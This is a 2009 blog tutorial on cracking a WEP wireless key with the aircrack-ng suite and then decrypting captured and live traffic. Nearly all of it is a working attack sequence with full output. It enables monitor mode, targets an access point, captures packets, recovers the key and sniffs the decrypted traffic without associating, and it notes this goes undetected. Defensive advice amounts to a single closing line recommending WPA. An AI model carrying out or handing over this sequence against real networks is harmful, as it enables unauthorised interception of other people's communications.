Aug 09 2009

How to crack a WEP key and decrypt live traffic

Published by at 8:02 pm under linux,security


Cracking a WEP key is extremely easy and is a matter of a few seconds. Truth? Pretty much… We are going to decrypt traffic in real time as well without even needing to connect to the wireless access point.
 
All steps will be run under root super-user as interfaces state needs to be changed.
 

To Start with

Download and install aircrack-ng. It’s available on most Linux distributions in a package format.
On Debian, run

apt-get install aircrack-ng

 
Aircrack provides tools to capture packets, crack the WEP key, and decrypt live traffic.
 
We’ll run tests with a Linksys PCMCIA wifi card. A simple ifconfig displays the card’s network stats that tells us it’s been detected.

root@crack_WEP:~# ifconfig
lo        Interface doesn't support scanning.

wlan0     Link encap:Ethernet  HWaddr 00:1a:70:6b:37:4e  
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:22 errors:0 dropped:0 overruns:0 frame:0
          TX packets:63 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:3742 (3.7 KB)  TX bytes:10773 (10.7 KB)

 

Capture packets

The interface needs to be switched to monitor mode.

root@crack_WEP:~# airmon-ng
Interface	Chipset		Driver
wlan0		Broadcom 43xx	b43 - [phy0]

 
Airmon has detected interface wlan0. It could be a different name of course such as ath0 for instance.

root@crack_WEP:~# airmon-ng stop wlan0
Interface	Chipset		Driver
wlan0		Broadcom 43xx	b43 - [phy0]
				(monitor mode disabled)

root@crack_WEP:~# airmon-ng start wlan0
Interface	Chipset		Driver
wlan0		Broadcom 43xx	b43 - [phy0]
				(monitor mode enabled on mon0)

 
Running iwconfig shows mon0 has been added in addition to the original interface wlan0:

root@crack_WEP:~# iwconfig
wlan0     IEEE 802.11bg  ESSID:""  
          Mode:Managed  Frequency:2.412 GHz  Access Point: Not-Associated   
          Tx-Power=27 dBm   
          Retry min limit:7   RTS thr:off   Fragment thr=2352 B   
          Encryption key:off
          Power Management:off
          Link Quality:0  Signal level:0  Noise level:0
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

mon0      IEEE 802.11bg  Mode:Monitor  Frequency:2.412 GHz  Tx-Power=27 dBm   
          Retry min limit:7   RTS thr:off   Fragment thr=2352 B   
          Encryption key:off
          Power Management:off
          Link Quality:0  Signal level:0  Noise level:0
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

 
We can now scan for available networks

root@crack_WEP:~# airodump-ng mon0
 CH 10 ][ Elapsed: 4 s ][ 2009-08-08 18:01                                     
 BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
 00:A0:C5:FF:84:72  197        4        0    0   1  11  WEP  WEP         private
 BSSID              STATION            PWR   Rate  Lost  Packets  Probes

 
Scan results show we've got an access point emitting on channel 1 with WEP encryption and which has mac address 00:A0:C5:FF:84:72.
The target now defined, we need to capture air packets.

root@crack_WEP:~# airodump-ng --channel 1 --bssid 00:A0:C5:FF:84:72 --write temp wlan0

 CH  1 ][ Elapsed: 31 mins ][ 2009-05-02 21:52                                         
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
 00:A0:C5:FF:84:72  205  10     6058    24496    0   1  54  WEP  WEP         private           
 BSSID              STATION            PWR   Rate  Lost  Packets  Probes                       
 00:A0:C5:FF:84:72  00:18:4D:76:30:EB  188  54-54     0    24795                               

 
Packets are captured in .cap files with the temp suffix.
Cracking techniques getting more efficient, there are good chances to crack a key with no more than 40000 packets with recent algorithms. Capturing time varies with the amount of traffic on the air link.
 

Crack the WEP key

It's now time to crack the WEP key:

root@crack_WEP:~# aircrack-ng -z -b 00:A0:C5:FF:84:72 temp.cap-0*.cap 

                                         Aircrack-ng 1.0 rc1

                         [00:00:22] Tested 240228 keys (got 41742 IVs)

   KB    depth   byte(vote)
    0    0/  1   B9(58880) A0(50688) 12(50176) F5(49920) 9E(48896) CD(48640) 
    1    0/  1   19(54784) E8(52480) FA(52480) 4B(51456) 79(51456) DD(49664) 
    2    0/  1   31(59648) EA(53504) 40(50688) 0A(50432) 88(50432) 0E(50176) 
    3    0/  1   8C(60416) 05(49152) 56(49152) 23(48640) 52(48384) 03(48128) 
    4    0/  1   B2(59136) AE(49664) 78(49152) FE(49152) 8B(48384) 9C(47616) 
    5    0/  1   61(53504) E6(50688) FF(50176) 13(49664) 23(49408) C7(49408) 
    6    0/  1   DD(56320) C4(51968) 90(50688) 0C(50176) CF(49920) CE(49152) 
    7    0/  1   4E(53248) E6(51968) 7D(49152) 0B(48896) 90(48896) 06(48640) 
    8    0/  1   FB(52224) C1(49664) E9(48128) 3D(47616) F0(47360) EB(47104) 
    9    0/  1   0B(54784) BC(51712) 52(50432) 54(49920) F5(49920) CA(48896) 
   10    0/  1   E6(50944) 1C(49920) 5F(49408) 1F(49152) 0A(48896) 83(48896) 
   11    2/  1   FF(49664) 17(48384) 94(48128) 27(47872) 23(47616) B2(47616) 
   12    0/  4   91(50452) A4(50360) 77(50156) 78(49540) FF(49476) 70(48788) 

             KEY FOUND! [ B9:19:31:8C:B2:61:DD:4E:FB:0B:AA:62:99 ] 
	Decrypted correctly: 100%

 
That’s right, the key was cracked in 22 seconds!
 

Decrypt the traffic

It is possible to capture the traffic in .cap files as above, decrypt it in a second file before sending it to the tcpdump command for instance:

root@crack_WEP:~# airdecap-ng -w b919318cb261dd4efb0baa6299 temp-01.cap 
Total number of packets read         22072
Total number of WEP data packets      6245
Total number of WPA data packets         0
Number of plaintext data packets         3
Number of decrypted WEP  packets      6245
Number of corrupted WEP  packets         0
Number of decrypted WPA  packets         0

root@crack_WEP:~# tcpdump -r temp-01-dec.cap -i wlan

 
But it is also possible to decrypt live traffic in real time sending it to a virtual interface at0 on which we can listen as with any real interface. Airtun-ng provided in Aircrack package has the ability to do so.

root@crack_WEP:~# airtun-ng -a 00:A0:C5:FF:84:72 -w b919318cb261dd4efb0baa6299 mon0
created tap interface at0
WEP encryption specified. Sending and receiving frames through mon0.
FromDS bit set in all frames.

 
From another shell:

crack_WEP:~# tcpdump -i at0

 

Conclusion

It is indeed very easy to crack a WEP key and listen to the traffic without associating to the access point hence without being detected. Pay attention to use at least WPA with non-dictionnary based passwords.


No responses yet

Comments RSS

Leave a Reply